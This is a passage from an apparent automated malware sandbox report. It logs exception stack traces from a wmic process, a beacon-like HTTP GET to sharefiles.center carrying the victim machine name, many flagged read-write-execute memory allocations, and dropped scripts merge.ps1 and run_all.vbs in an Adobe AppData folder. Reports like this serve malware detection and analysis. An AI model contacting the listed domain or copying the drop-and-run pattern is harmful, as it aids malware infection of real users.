GetMessageW-0x58 user32+0x1788a @ 0x7573788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75a9a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75a9853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75a9a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75aacd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75aad87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7588b727 registers.esp: 41152660 registers.edi: 7658684 registers.eax: 41152660 registers.ebp: 41152740 registers.edx: 50 registers.ebx: 41153024 registers.esi: 2147746133 registers.ecx: 7431840	1	0	0
__exception__ Aug. 21, 2024, 2:24 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75bbf725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x750c414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75a8fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75bba338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x752ce99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x752a72ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x7529ab0d IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x752cc048 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752987f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x75298926 RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x7529d55e IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x752cc44b RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x7529d1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x7529d1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x7529d40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x7529991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x75298d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x7529a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x75299b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x75299aa8 DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x741f6f4f DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x741f6e40 DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x741f27a4 DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x741f2652 DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x741f253d DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x741f2411 DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x741f25ab wmic+0x39c80 @ 0x559c80 wmic+0x3b06a @ 0x55b06a wmic+0x3b1f8 @ 0x55b1f8 wmic+0x36fcd @ 0x556fcd wmic+0x3d6e9 @ 0x55d6e9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7588b727 registers.esp: 2878432 registers.edi: 1974270480 registers.eax: 2878432 registers.ebp: 2878512 registers.edx: 1 registers.ebx: 7401500 registers.esi: 2147746133 registers.ecx: 1822471445	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Aug. 21, 2024, 2:24 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75ae4387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x750aef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x750a6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x750a6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x750a6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x750c5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x751406b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75bbd7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75bbd876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75bbddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75ad8a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75ad8938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75ad950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75bbdccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75bbdb41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75bbe1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75ad9367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75ad9326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75736d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x757377c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7573788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75a9a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75a9853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75a9a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75aacd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75aad87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7588b727
registers.esp: 41152660
registers.edi: 7658684
registers.eax: 41152660
registers.ebp: 41152740
registers.edx: 50
registers.ebx: 41153024
registers.esi: 2147746133
registers.ecx: 7431840

__exception__

Aug. 21, 2024, 2:24 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75bbf725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x750c414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75a8fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75bba338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x752ce99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x752a72ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x7529ab0d
IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x752cc048
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752987f7
RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x75298926
RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x7529d55e
IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x752cc44b
RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x7529d1f6
RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x7529d1ac
RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x7529d40b
RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x7529991b
RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x75298d67
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x7529a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x75299b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x75299aa8
DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x741f6f4f
DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x741f6e40
DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x741f27a4
DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x741f2652
DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x741f253d
DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x741f2411
DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x741f25ab
wmic+0x39c80 @ 0x559c80
wmic+0x3b06a @ 0x55b06a
wmic+0x3b1f8 @ 0x55b1f8
wmic+0x36fcd @ 0x556fcd
wmic+0x3d6e9 @ 0x55d6e9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7588b727
registers.esp: 2878432
registers.edi: 1974270480
registers.eax: 2878432
registers.ebp: 2878512
registers.edx: 1
registers.ebx: 7401500
registers.esi: 2147746133
registers.ecx: 1822471445

Performs some HTTP requests (1 event)

request

GET https://sharefiles.center/TEST22-PC

Allocates read-write-execute memory (usually to unpack itself) (50 out of 155 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 21, 2024, 2:25 p.m.	process_identifier: 1236 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000007930000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2320 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74121000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 1720 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74412000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 1968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74412000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2984 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74412000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 1572864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02940000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72c21000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01faa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72c22000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fa2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a81000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0201a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0206b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02067000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02012000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02065000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0201c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0206c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02013000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02014000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02015000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02016000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02017000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02018000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02019000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b81000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b83000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b84000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b85000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b86000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b87000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b88000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b89000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b8a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b8b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b8c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b8d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b8e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 21, 2024, 2:24 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b8f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (3 events)

file	C:\Users\test22\AppData\Roaming\Adobe\merge.ps1
file	C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs
